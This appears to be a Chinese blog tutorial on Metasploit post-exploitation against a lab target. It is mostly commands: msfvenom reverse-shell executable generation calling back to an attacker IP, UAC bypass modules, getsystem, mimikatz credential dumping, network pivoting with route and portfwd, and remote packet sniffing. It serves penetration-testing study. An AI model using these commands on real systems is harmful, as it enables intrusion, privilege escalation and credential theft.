metasplort后渗透模块介绍

1. 获取sesson
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp Lhost=192.168.48.129 LPORT=9999 -b “\00” -e x86/shikata_ga_nai -f exe -o ss.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 9999
set lhost 0.0.0.0
metasplort后渗透模块介绍_第1张图片
目标靶机运行执行脚本
metasplort后渗透模块介绍_第2张图片
getsystem失败–因为UAC对我们的命令做了限制
在这里插入图片描述
2. 使用UACpypass,提升session权限
use exploit/windows/local/ask
set session 1
set filename 360up.exe
metasplort后渗透模块介绍_第3张图片
在这里插入图片描述

3. 使用UACpypass第二种方法,客户端无感知
use exploit/windows/local/bypassuac
metasplort后渗透模块介绍_第4张图片
在这里插入图片描述

4. 制作一个64位的payload让目标靶机执行
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp Lhost=192.168.48.129 LPORT=9999 -f exe -o sss.exe
metasplort后渗透模块介绍_第5张图片
在这里插入图片描述
metasplort后渗透模块介绍_第6张图片
metasplort后渗透模块介绍_第7张图片

meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
metasplort后渗透模块介绍_第8张图片
metasplort后渗透模块介绍_第9张图片
metasplort后渗透模块介绍_第10张图片
metasplort后渗透模块介绍_第11张图片

7. 自动发现可利用的漏洞
use post/multi/recon/local_exploit_suggester
metasplort后渗透模块介绍_第12张图片
8. 使用vnc payload 进行图形化界面查看或者控制
use exploit/windows/local/bypassuac_injection
set payload windows/x64/vncinject/reverse_tcp
metasplort后渗透模块介绍_第13张图片

9. 试利用现有的漏洞对内网进行攻击
1).建立session路由,让我们能够访问对端网络
route add 192.168.100.0 255.255.255.0 5
2).做端口映射(netstart -an|more)
session 5
portfwd add -l 445 -r 127.0.0.1 -p 445
-l 在kali上监听的端口
-r 目标IP,可以是对端本机(127.0.0.1),或者是对端可以访问到的任何IP
-p 目标端口
msf --> kali(445)—> 靶机(跳板) ----> 目标ip:端口
meterpreter>portfwd
10. 远程抓包
远程截图
在这里插入图片描述
metasplort后渗透模块介绍_第14张图片

抓包(meterpreter)
load sniffer
?
metasplort后渗透模块介绍_第15张图片
sniffer_interfaces
在这里插入图片描述
sniffer_start 2
metasplort后渗透模块介绍_第16张图片
sniffer_dump 2 1.cap
metasplort后渗透模块介绍_第17张图片
use auxiliary/sniffer/psnuffle
metasplort后渗透模块介绍_第18张图片
metasplort后渗透模块介绍_第19张图片
在内存中缓存区块循环存储抓包(50000包),不写硬盘
智能过滤meterpreter流量,传输全程使用SSL/TLS加密
解码
set PCAPFILE 1. cap

你可能感兴趣的:(网络安全)